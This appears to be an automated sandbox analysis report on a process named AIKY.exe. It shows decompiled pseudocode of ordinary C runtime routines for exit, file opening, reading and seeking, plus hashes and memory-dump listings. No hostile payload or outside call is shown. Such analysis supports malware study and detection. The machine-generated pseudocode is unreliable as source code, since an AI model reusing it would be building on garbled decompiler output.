_free.LIBCMT ref: 00B60F4B

Strings

SystemRoot, xrefs: 00B61186, 00B61189

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: __dosmaperr_free
String ID: SystemRoot
API String ID: 3116789124-2034820756
Opcode ID: 809885cbedb6cc6455e818ad99f89a2d06bd8bd6b905e49538172ca5cf95a330
Instruction ID: 63fd548896a0a87d38d0641abb7c23be96aae393908c755745750a139fa890b4
Opcode Fuzzy Hash: 809885cbedb6cc6455e818ad99f89a2d06bd8bd6b905e49538172ca5cf95a330
Instruction Fuzzy Hash: 0F213532A05215AFEB14EF6AC890BAAB7E8EF42325F2440EDFC48DB341D676DD018750

Uniqueness

Uniqueness Score: -1.00%

Function 00B5AD1F, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 89
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00B5AD1F(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4) {
				intOrPtr _v8;
				void* __ecx;
				intOrPtr* _t11;
				intOrPtr _t17;
				intOrPtr _t18;
				void* _t20;
				intOrPtr _t21;
				void* _t25;
				void* _t26;
				void* _t30;
				intOrPtr* _t34;
				void* _t36;
				intOrPtr* _t38;
				void* _t40;
				void* _t41;
				void* _t46;
				void* _t48;

				_t40 = __esi;
				_t26 = __ebx;
				_push(__edi);
				_t38 = _a4;
				if(_t38 != 0) {
					_t30 = 0;
					_t11 = _t38;
					if( *_t38 != 0) {
						do {
							_t11 = _t11 + 4;
							_t30 = _t30 + 1;
						} while ( *_t11 != 0);
					}
					_t3 = _t30 + 1; // 0x2
					_t41 = E00B598AF(_t3, 4);
					_t32 = _t40;
					if(_t41 == 0) {
						L15:
						E00B55E69(_t26, _t32, _t36, _t38, _t41);
						goto L16;
					} else {
						_t34 =  *_t38;
						if(_t34 == 0) {
							L14:
							E00B564B8(0);
							_t20 = _t41;
							goto L2;
						} else {
							_push(_t26);
							_t26 = _t41 - _t38;
							do {
								_t4 = _t34 + 1; // 0x5
								_t36 = _t4;
								do {
									_t21 =  *_t34;
									_t34 = _t34 + 1;
								} while (_t21 != 0);
								_t5 = _t34 - _t36 + 1; // 0x6
								_v8 = _t5;
								 *((intOrPtr*)(_t26 + _t38)) = E00B598AF(_t5, 1);
								E00B564B8(0);
								_t48 = _t46 + 0xc;
								if( *((intOrPtr*)(_t26 + _t38)) == 0) {
									goto L15;
								} else {
									_t25 = E00B56383( *((intOrPtr*)(_t26 + _t38)), _v8,  *_t38);
									_t46 = _t48 + 0xc;
									if(_t25 != 0) {
										L16:
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										_push(0);
										E00B52919();
										asm("int3");
										_t17 =  *0xb6a510; // 0x7c3e78
										if(_t17 ==  *0xb6a51c) {
											_t18 = E00B5AD1F(_t26, _t38, _t41, _t17);
											 *0xb6a510 = _t18;
											return _t18;
										}
										return _t17;
									} else {
										goto L12;
									}
								}
								goto L20;
								L12:
								_t38 = _t38 + 4;
								_t34 =  *_t38;
							} while (_t34 != 0);
							goto L14;
						}
					}
				} else {
					_t20 = 0;
					L2:
					return _t20;
				}
				L20:
			}

0x00b5ad1f
0x00b5ad1f
0x00b5ad25
0x00b5ad26
0x00b5ad2b
0x00b5ad34
0x00b5ad36
0x00b5ad3a
0x00b5ad3c
0x00b5ad3c
0x00b5ad3f
0x00b5ad40
0x00b5ad3c
0x00b5ad46
0x00b5ad51
0x00b5ad54
0x00b5ad57
0x00b5adbf
0x00b5adbf
0x00000000
0x00b5ad59
0x00b5ad59
0x00b5ad5d
0x00b5adaf
0x00b5adb1
0x00b5adb7
0x00000000
0x00b5ad5f
0x00b5ad5f
0x00b5ad62
0x00b5ad64
0x00b5ad64
0x00b5ad64
0x00b5ad67
0x00b5ad67
0x00b5ad69
0x00b5ad6a
0x00b5ad72
0x00b5ad76
0x00b5ad80
0x00b5ad83
0x00b5ad88
0x00b5ad8f
0x00000000
0x00b5ad91
0x00b5ad99
0x00b5ad9e
0x00b5ada3
0x00b5adc4
0x00b5adc6
0x00b5adc7
0x00b5adc8
0x00b5adc9
0x00b5adca
0x00b5adcb
0x00b5add0
0x00b5add1
0x00b5addc
0x00b5addf
0x00b5ade5
0x00000000
0x00b5ade5
0x00b5adea
0x00000000
0x00000000
0x00000000
0x00b5ada3
0x00000000
0x00b5ada5
0x00b5ada5
0x00b5ada8
0x00b5adaa
0x00000000
0x00b5adae
0x00b5ad5d
0x00b5ad2d
0x00b5ad2d
0x00b5ad2f
0x00b5ad33
0x00b5ad33
0x00000000

APIs

_free.LIBCMT ref: 00B5AD83
_free.LIBCMT ref: 00B5ADB1

Part of subcall function 00B55E69: IsProcessorFeaturePresent.KERNEL32(00000017,00B583C9,?,00B4AB3B,80(,$,00B3DA3C,00000000,?,?,00B49006,00000000,00B3DA3C,00B3DA3C), ref: 00B55E85

Part of subcall function 00B52919: IsProcessorFeaturePresent.KERNEL32(00000017,00B528EB,?,80(,$,?,00B3DA3C,00B3DA3C,0(,$,?,00B528F8,00000000,00000000,00000000,00000000,00000000,00B5E12C), ref: 00B5291B
Part of subcall function 00B52919: GetCurrentProcess.KERNEL32(C0000417), ref: 00B5293E
Part of subcall function 00B52919: TerminateProcess.KERNEL32(00000000), ref: 00B52945

Strings

x>|, xrefs: 00B5ADD1, 00B5ADE5

Memory Dump Source

Source File: 00000021.00000002.457737013.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000021.00000002.457727689.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457780329.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000021.00000002.457793668.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000021.00000002.457820393.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: FeaturePresentProcessProcessor_free$CurrentTerminate
String ID: x>|
API String ID: 1729132349-3184903824
Opcode ID: 751145c7fb0f6e7fa7d535e4e43627ab79f3ec76dd164933b6097f89a3c37fd2
Instruction ID: d7dc1e7565efbb67d295a133b83a0dace47344271fd46d10f3b4e0e30227d50d
Opcode Fuzzy Hash: 751145c7fb0f6e7fa7d535e4e43627ab79f3ec76dd164933b6097f89a3c37fd2
Instruction Fuzzy Hash: 352100716002059BDF14BB64D851B75B7F9EF44713F2802FAED05EB6C1EA76CD088A51

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: AIKY.exe PID: 244 Parent PID: 3332 AIKY.exeCOMMON

Executed Functions

Function 00B52E1C, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B52E1C(int _a4) {
				void* _t14;

				if(E00B59643(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E00B52E5E(_t14, _a4);
				ExitProcess(_a4);
			}

0x00b52e29
0x00b52e45
0x00b52e45
0x00b52e4e
0x00b52e57

APIs

GetCurrentProcess.KERNEL32(?,?,00B52E1B,00000001,00000000,?,00000001,?,00B58F84), ref: 00B52E3E
TerminateProcess.KERNEL32(00000000,?,00B52E1B,00000001,00000000,?,00000001,?,00B58F84), ref: 00B52E45
ExitProcess.KERNEL32 ref: 00B52E57

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 80fddf3854e95d028ca3e79cf7e4a8d23e78625ed6adc2bc930c777ac134c4e2
Instruction ID: 16744d49e27680b0c360ff3eb38a75a49ef4701e8ce751448427932d655e4dcb
Opcode Fuzzy Hash: 80fddf3854e95d028ca3e79cf7e4a8d23e78625ed6adc2bc930c777ac134c4e2
Instruction Fuzzy Hash: 95E04631041108AFCF223F54CE4AA493BA9EB42342B0004D4FD0997131CF7AED9ACA80

Uniqueness

Uniqueness Score: -1.00%

Function 00B61E73, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 274
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00B61E73(void* __ecx, void* __eflags, intOrPtr* _a4, signed int* _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20, intOrPtr _a24) {
				signed int _v5;
				char _v6;
				void* _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v36;
				signed int _v44;
				void _v48;
				char _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t114;
				void* _t122;
				signed int _t123;
				signed char _t124;
				signed int _t134;
				intOrPtr _t162;
				intOrPtr _t178;
				void* _t188;
				signed int* _t189;
				signed int _t191;
				char _t196;
				signed int _t202;
				signed int _t205;
				signed int _t214;
				signed int _t216;
				signed int _t218;
				signed int _t224;
				signed int _t226;
				signed int _t233;
				signed int _t234;
				signed int _t236;
				signed int _t238;
				signed char _t241;
				signed int _t242;
				intOrPtr _t246;
				void* _t253;
				void* _t263;
				signed int _t264;
				signed int _t267;
				signed int _t268;
				signed int _t271;
				void* _t273;
				void* _t275;
				void* _t276;
				void* _t278;
				void* _t279;
				void* _t281;
				void* _t285;

				_t263 = E00B61BBB(__ecx,  &_v72, _a16, _a20, _a24);
				_t191 = 6;
				memcpy( &_v48, _t263, _t191 << 2);
				_t275 = _t273 + 0x1c;
				_t264 = _t263 | 0xffffffff;
				if(_v36 != _t264) {
					_t114 = E00B5B06B(_t188, __eflags);
					_t189 = _a8;
					 *_t189 = _t114;
					__eflags = _t114 - _t264;
					if(_t114 != _t264) {
						_v20 = _v20 & 0x00000000;
						_v24 = 0xc;
						_t276 = _t275 - 0x18;
						 *_a4 = 1;
						_push(6);
						_v16 =  !(_a16 >> 7) & 1;
						_push( &_v24);
						_push(_a12);
						memcpy(_t276,  &_v48, 1 << 2);
						_t196 = 0;
						_t122 = E00B61B26(); // executed
						_t253 = _t122;
						_t278 = _t276 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							L11:
							_t123 = GetFileType(_t253); // executed
							__eflags = _t123;
							if(_t123 != 0) {
								__eflags = _t123 - 2;
								if(_t123 != 2) {
									__eflags = _t123 - 3;
									_t124 = _v48;
									if(_t123 == 3) {
										_t124 = _t124 | 0x00000008;
										__eflags = _t124;
									}
								} else {
									_t124 = _v48 | 0x00000040;
								}
								_v5 = _t124;
								E00B5AFB4(_t196,  *_t189, _t253);
								_t241 = _v5 | 0x00000001;
								_v5 = _t241;
								_v48 = _t241;
								 *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) = _t241;
								_t202 =  *_t189;
								_t204 = (_t202 & 0x0000003f) * 0x38;
								__eflags = _a16 & 0x00000002;
								 *((char*)( *((intOrPtr*)(0xb6a6c8 + (_t202 >> 6) * 4)) + 0x29 + (_t202 & 0x0000003f) * 0x38)) = 0;
								if((_a16 & 0x00000002) == 0) {
									L22:
									_v6 = 0;
									_push( &_v6);
									_push(_a16);
									_t279 = _t278 - 0x18;
									_t205 = 6;
									_push( *_t189);
									memcpy(_t279,  &_v48, _t205 << 2);
									_t134 = E00B618D1(_t189,  &_v48 + _t205 + _t205,  &_v48);
									_t242 =  *_t189;
									_t267 = _t134;
									_t281 = _t279 + 0x30;
									__eflags = _t267;
									if(__eflags == 0) {
										 *((char*)( *((intOrPtr*)(0xb6a6c8 + (_t242 >> 6) * 4)) + 0x29 + (_t242 & 0x0000003f) * 0x38)) = _v6;
										 *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38) ^ (_a16 >> 0x00000010 ^  *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x2d + ( *_t189 & 0x0000003f) * 0x38)) & 0x00000001;
										__eflags = _v5 & 0x00000048;
										if((_v5 & 0x00000048) == 0) {
											__eflags = _a16 & 0x00000008;
											if((_a16 & 0x00000008) != 0) {
												_t224 =  *_t189;
												_t226 = (_t224 & 0x0000003f) * 0x38;
												_t162 =  *((intOrPtr*)(0xb6a6c8 + (_t224 >> 6) * 4));
												_t87 = _t162 + _t226 + 0x28;
												 *_t87 =  *(_t162 + _t226 + 0x28) | 0x00000020;
												__eflags =  *_t87;
											}
										}
										_t268 = _v44;
										__eflags = (_t268 & 0xc0000000) - 0xc0000000;
										if((_t268 & 0xc0000000) != 0xc0000000) {
											L32:
											__eflags = 0;
											return 0;
										} else {
											__eflags = _a16 & 0x00000001;
											if((_a16 & 0x00000001) == 0) {
												goto L32;
											}
											CloseHandle(_v12);
											_v44 = _t268 & 0x7fffffff;
											_t214 = 6;
											_push( &_v24);
											_push(_a12);
											memcpy(_t281 - 0x18,  &_v48, _t214 << 2);
											_t246 = E00B61B26();
											__eflags = _t246 - 0xffffffff;
											if(_t246 != 0xffffffff) {
												_t216 =  *_t189;
												_t218 = (_t216 & 0x0000003f) * 0x38;
												__eflags = _t218;
												 *((intOrPtr*)( *((intOrPtr*)(0xb6a6c8 + (_t216 >> 6) * 4)) + _t218 + 0x18)) = _t246;
												goto L32;
											}
											E00B55B87(GetLastError());
											 *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
											E00B5B174( *_t189);
											L10:
											goto L2;
										}
									}
									_push(_t242);
									goto L21;
								} else {
									_t267 = E00B61D37(_t204,  *_t189);
									__eflags = _t267;
									if(__eflags == 0) {
										goto L22;
									}
									_push( *_t189);
									L21:
									E00B58BA1(__eflags);
									return _t267;
								}
							}
							_t271 = GetLastError();
							E00B55B87(_t271);
							 *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) =  *( *((intOrPtr*)(0xb6a6c8 + ( *_t189 >> 6) * 4)) + 0x28 + ( *_t189 & 0x0000003f) * 0x38) & 0x000000fe;
							CloseHandle(_t253);
							__eflags = _t271;
							if(_t271 == 0) {
								 *((intOrPtr*)(E00B55BBD())) = 0xd;
							}
							goto L2;
						}
						_t233 = _v44;
						__eflags = (_t233 & 0xc0000000) - 0xc0000000;
						if((_t233 & 0xc0000000) != 0xc0000000) {
							L9:
							_t234 =  *_t189;
							_t236 = (_t234 & 0x0000003f) * 0x38;
							_t178 =  *((intOrPtr*)(0xb6a6c8 + (_t234 >> 6) * 4));
							_t33 = _t178 + _t236 + 0x28;
							 *_t33 =  *(_t178 + _t236 + 0x28) & 0x000000fe;
							__eflags =  *_t33;
							E00B55B87(GetLastError());
							goto L10;
						}
						__eflags = _a16 & 0x00000001;
						if((_a16 & 0x00000001) == 0) {
							goto L9;
						}
						_t285 = _t278 - 0x18;
						_v44 = _t233 & 0x7fffffff;
						_t238 = 6;
						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E00B61B26();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E00B55BAA()) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E00B55BBD())) = 0x18;
						goto L2;
					}
				} else {
					 *(E00B55BAA()) =  *_t186 & 0x00000000;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E00B55BBD()));
				}
			}

APIs

Part of subcall function 00B61B26: CreateFileW.KERNELBASE(00000000,00000000,?,00B61F1C,?,?,00000000,?,00B61F1C,00000000,0000000C), ref: 00B61B43

GetLastError.KERNEL32 ref: 00B61F87
__dosmaperr.LIBCMT ref: 00B61F8E
GetFileType.KERNELBASE(00000000), ref: 00B61F9A
GetLastError.KERNEL32 ref: 00B61FA4
__dosmaperr.LIBCMT ref: 00B61FAD
CloseHandle.KERNEL32(00000000), ref: 00B61FCD
CloseHandle.KERNEL32(00B5892B), ref: 00B6211A
GetLastError.KERNEL32 ref: 00B6214C
__dosmaperr.LIBCMT ref: 00B62153

Strings

H, xrefs: 00B620D8

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 98fa90234541cb55081df3580254d39ec999e7adfcabe246a328957eb958c973
Instruction ID: c5956d696b5896422852ae79306637db79c955fd15a45aa975bf40feba647256
Opcode Fuzzy Hash: 98fa90234541cb55081df3580254d39ec999e7adfcabe246a328957eb958c973
Instruction Fuzzy Hash: FFA13532A045448FDF29DF68DC92BAD3BE0EB06325F1801D9EC11AB2E1DB798C06CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B57A53, Relevance: 13.8, APIs: 9, Instructions: 302
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B57A53(signed int _a4, void* _a8, unsigned int _a12) {
				char _v5;
				signed int _v12;
				unsigned int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				long _v32;
				char _v36;
				void* _v40;
				long _v44;
				signed int* _t137;
				signed int _t139;
				intOrPtr _t143;
				signed char _t148;
				unsigned int _t154;
				intOrPtr _t158;
				signed int _t160;
				signed int _t163;
				long _t164;
				intOrPtr _t169;
				signed int _t170;
				intOrPtr _t172;
				signed int _t174;
				signed int _t178;
				void _t180;
				char _t185;
				char _t190;
				signed char _t196;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t207;
				long _t210;
				unsigned int _t212;
				intOrPtr _t214;
				unsigned int _t217;
				signed int _t219;
				signed int _t220;
				signed int _t221;
				signed int _t222;
				signed char _t224;
				char _t226;
				signed int _t228;
				void* _t229;
				signed int _t230;
				char* _t231;
				char* _t232;
				signed int _t235;
				signed int _t236;
				void* _t240;
				void* _t242;
				void* _t243;

				_t198 = _a4;
				if(_t198 != 0xfffffffe) {
					__eflags = _t198;
					if(_t198 < 0) {
						L59:
						_t137 = E00B55BAA();
						 *_t137 =  *_t137 & 0x00000000;
						__eflags =  *_t137;
						 *((intOrPtr*)(E00B55BBD())) = 9;
						L60:
						_t139 = E00B528EC();
						goto L61;
					}
					__eflags = _t198 -  *0xb6a8c8; // 0x40
					if(__eflags >= 0) {
						goto L59;
					}
					_t207 = _t198 >> 6;
					_t235 = (_t198 & 0x0000003f) * 0x38;
					_v12 = _t207;
					_t143 =  *((intOrPtr*)(0xb6a6c8 + _t207 * 4));
					_v20 = _t235;
					_v36 = 1;
					_t224 =  *((intOrPtr*)(_t143 + _t235 + 0x28));
					__eflags = 1 & _t224;
					if((1 & _t224) == 0) {
						goto L59;
					}
					_t210 = _a12;
					__eflags = _t210 - 0x7fffffff;
					if(_t210 <= 0x7fffffff) {
						__eflags = _t210;
						if(_t210 == 0) {
							L58:
							return 0;
						}
						__eflags = _t224 & 0x00000002;
						if((_t224 & 0x00000002) != 0) {
							goto L58;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_v28 =  *((intOrPtr*)(_t143 + _t235 + 0x18));
						_t226 =  *((intOrPtr*)(_t143 + _t235 + 0x29));
						_v5 = _t226;
						_t240 = 0;
						_t228 = _t226 - 1;
						__eflags = _t228;
						if(_t228 == 0) {
							_t148 =  !_t210;
							__eflags = _t148 & 0x00000001;
							if((_t148 & 0x00000001) == 0) {
								L14:
								 *(E00B55BAA()) =  *_t149 & _t240;
								 *((intOrPtr*)(E00B55BBD())) = 0x16;
								E00B528EC();
								goto L39;
							} else {
								_t154 = 4;
								_t212 = _t210 >> 1;
								_v16 = _t154;
								__eflags = _t212 - _t154;
								if(_t212 >= _t154) {
									_t154 = _t212;
									_v16 = _t212;
								}
								_t240 = E00B56F1C(_t154);
								E00B564B8(0);
								E00B564B8(0);
								_t243 = _t242 + 0xc;
								_v24 = _t240;
								__eflags = _t240;
								if(_t240 != 0) {
									_t158 = E00B572D3(_t198, 0, 0, 1);
									_t242 = _t243 + 0x10;
									_t214 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
									 *((intOrPtr*)(_t235 + _t214 + 0x20)) = _t158;
									 *(_t235 + _t214 + 0x24) = _t228;
									_t229 = _t240;
									_t210 = _v16;
									_t143 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
									L22:
									_t199 = _v20;
									_t235 = 0;
									_v40 = _t229;
									__eflags =  *(_t199 + _t143 + 0x28) & 0x00000048;
									_t200 = _a4;
									if(( *(_t199 + _t143 + 0x28) & 0x00000048) != 0) {
										_t180 =  *((intOrPtr*)(_v20 + _t143 + 0x2a));
										_t200 = _a4;
										__eflags = _t180 - 0xa;
										if(_t180 != 0xa) {
											__eflags = _t210;
											if(_t210 != 0) {
												_t235 = 1;
												 *_t229 = _t180;
												_t231 = _t229 + 1;
												_t220 = _t210 - 1;
												__eflags = _v5;
												_v24 = _t231;
												_v16 = _t220;
												 *((char*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2a)) = 0xa;
												_t200 = _a4;
												if(_v5 != 0) {
													_t185 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2b));
													_t200 = _a4;
													__eflags = _t185 - 0xa;
													if(_t185 != 0xa) {
														__eflags = _t220;
														if(_t220 != 0) {
															 *_t231 = _t185;
															_t232 = _t231 + 1;
															_t221 = _t220 - 1;
															__eflags = _v5 - 1;
															_v24 = _t232;
															_t235 = 2;
															_v16 = _t221;
															 *((char*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2b)) = 0xa;
															_t200 = _a4;
															if(_v5 == 1) {
																_t190 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2c));
																_t200 = _a4;
																__eflags = _t190 - 0xa;
																if(_t190 != 0xa) {
																	__eflags = _t221;
																	if(_t221 != 0) {
																		 *_t232 = _t190;
																		_t222 = _t221 - 1;
																		__eflags = _t222;
																		_v16 = _t222;
																		_v24 = _t232 + 1;
																		_t235 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0xb6a6c8 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t160 = E00B614F2(_t200);
									__eflags = _t160;
									if(_t160 == 0) {
										L42:
										_v36 = 0;
										L43:
										_t163 = ReadFile(_v28, _v24, _v16,  &_v32, 0); // executed
										__eflags = _t163;
										if(_t163 == 0) {
											L54:
											_t164 = GetLastError();
											_t235 = 5;
											__eflags = _t164 - _t235;
											if(_t164 != _t235) {
												__eflags = _t164 - 0x6d;
												if(_t164 != 0x6d) {
													L38:
													E00B55B87(_t164);
													goto L39;
												}
												_t236 = 0;
												goto L40;
											}
											 *((intOrPtr*)(E00B55BBD())) = 9;
											 *(E00B55BAA()) = _t235;
											goto L39;
										}
										_t217 = _a12;
										__eflags = _v32 - _t217;
										if(_v32 > _t217) {
											goto L54;
										}
										_t236 = _t235 + _v32;
										__eflags = _t236;
										L46:
										_t230 = _v20;
										_t169 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
										__eflags =  *((char*)(_t230 + _t169 + 0x28));
										if( *((char*)(_t230 + _t169 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v36;
												_push(_t236 >> 1);
												_push(_v40);
												_push(_t200);
												if(_v36 == 0) {
													_t170 = E00B575AE();
												} else {
													_t170 = E00B578CE();
												}
											} else {
												_t218 = _t217 >> 1;
												__eflags = _t217 >> 1;
												_t170 = E00B57775(_t217 >> 1, _t217 >> 1, _t200, _v24, _t236, _a8, _t218);
											}
											_t236 = _t170;
										}
										goto L40;
									}
									_t219 = _v20;
									_t172 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
									__eflags =  *((char*)(_t219 + _t172 + 0x28));
									if( *((char*)(_t219 + _t172 + 0x28)) >= 0) {
										goto L42;
									}
									_t174 = GetConsoleMode(_v28,  &_v44);
									__eflags = _t174;
									if(_t174 == 0) {
										goto L42;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L43;
									}
									_t178 = ReadConsoleW(_v28, _v24, _v16 >> 1,  &_v32, 0);
									__eflags = _t178;
									if(_t178 != 0) {
										_t217 = _a12;
										_t236 = _t235 + _v32 * 2;
										goto L46;
									}
									_t164 = GetLastError();
									goto L38;
								} else {
									 *((intOrPtr*)(E00B55BBD())) = 0xc;
									 *(E00B55BAA()) = 8;
									L39:
									_t236 = _t235 | 0xffffffff;
									__eflags = _t236;
									L40:
									E00B564B8(_t240);
									return _t236;
								}
							}
						}
						__eflags = _t228 == 1;
						if(_t228 == 1) {
							_t196 =  !_t210;
							__eflags = _t196 & 0x00000001;
							if((_t196 & 0x00000001) != 0) {
								_t229 = _a8;
								_v16 = _t210;
								_v24 = _t229;
								_t143 =  *((intOrPtr*)(0xb6a6c8 + _v12 * 4));
								goto L22;
							}
							goto L14;
						} else {
							_t229 = _a8;
							_v16 = _t210;
							_v24 = _t229;
							goto L22;
						}
					}
					L6:
					 *(E00B55BAA()) =  *_t145 & 0x00000000;
					 *((intOrPtr*)(E00B55BBD())) = 0x16;
					goto L60;
				} else {
					 *(E00B55BAA()) =  *_t197 & 0x00000000;
					_t139 = E00B55BBD();
					 *_t139 = 9;
					L61:
					return _t139 | 0xffffffff;
				}
			}

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383780875.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000024.00000002.383792317.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 25c80c06cdc971219c9eaea499cd93825816fede37441dcdb49f841679065af4
Instruction ID: fdb51c7f1fccf8dbfef3f838d011cc99422b6657446c7817168d18a25a10b921
Opcode Fuzzy Hash: 25c80c06cdc971219c9eaea499cd93825816fede37441dcdb49f841679065af4
Instruction Fuzzy Hash: DCC1B1B0A482459FDB11DF98E880BBDBBF0EF49312F1441D9ED05A7391CB749949CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B57229, Relevance: 7.6, APIs: 5, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E00B57229(union _LARGE_INTEGER* __edx, void* _a4, union _LARGE_INTEGER _a8, intOrPtr _a12) {
				long _v8;
				void* _v12;
				union _LARGE_INTEGER* _v16;
				void* _v20;
				int _t17;
				signed int _t19;
				void* _t21;
				union _LARGE_INTEGER* _t25;

				_t25 = __edx;
				_push(1);
				if(SetFilePointerEx(_a4, 0, 0,  &_v20) == 0) {
					L1:
					_t19 = E00B55B87(GetLastError());
					L7:
					return _t19 | 0xffffffff;
				}
				_push(_a12);
				asm("cdq");
				_v12 = 0;
				_v8 = 0;
				_t17 = SetFilePointerEx(_a4, _a8, _t25,  &_v12); // executed
				__eflags = _t17;
				if(_t17 == 0) {
					goto L1;
				}
				_t21 = _v12;
				__eflags = _v8;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						L6:
						_push(0);
						SetFilePointerEx(_a4, _v20, _v16, 0);
						_t19 = E00B55BBD();
						 *_t19 = 0x16;
						goto L7;
					}
					__eflags = _t21 - 0x7fffffff;
					if(_t21 > 0x7fffffff) {
						goto L6;
					}
				}
				return _t21;
			}

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 00B5723F
GetLastError.KERNEL32(?,?,?), ref: 00B57249
__dosmaperr.LIBCMT ref: 00B57250
SetFilePointerEx.KERNELBASE(?,?,?,?,?), ref: 00B5726E
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00B57294

Memory Dump Source

Source File: 00000024.00000002.383736742.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000024.00000002.383730968.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000024.00000002.383772160.0000000000B67000.00000002.00020000.sdmp Download File
